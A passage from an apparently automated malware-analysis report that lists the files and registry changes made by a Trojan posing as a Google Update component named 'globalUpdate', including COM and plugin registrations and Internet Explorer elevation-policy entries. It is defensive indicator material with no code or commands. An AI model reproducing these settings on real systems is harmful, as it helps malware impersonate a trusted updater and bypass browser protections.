%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\275[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app_code[1].js (736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\230[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\set_campaign_id_m[1].js (508 bytes)

Registry activity

The process GoogleUpdate.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 44 FC 46 17 38 E3 97 36 D2 61 4A A3 FA D2 C6"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{B13CB685-2858-4509-BB2E-34E3545B73F9}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

The process GoogleUpdate.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"

[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1413862435"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 92 F4 66 72 14 7F E1 AA B2 C8 FC 8E 30 19 46"

[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"

[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

The process GoogleUpdate.exe:2652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 5F DE 54 9B E3 20 26 3E 7B 60 E6 D1 93 0B C1"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"

[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 48 80 90 16 B1 9E B5 7A 8B FF 4E 4F 2C 34 3E"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"

[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"

[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
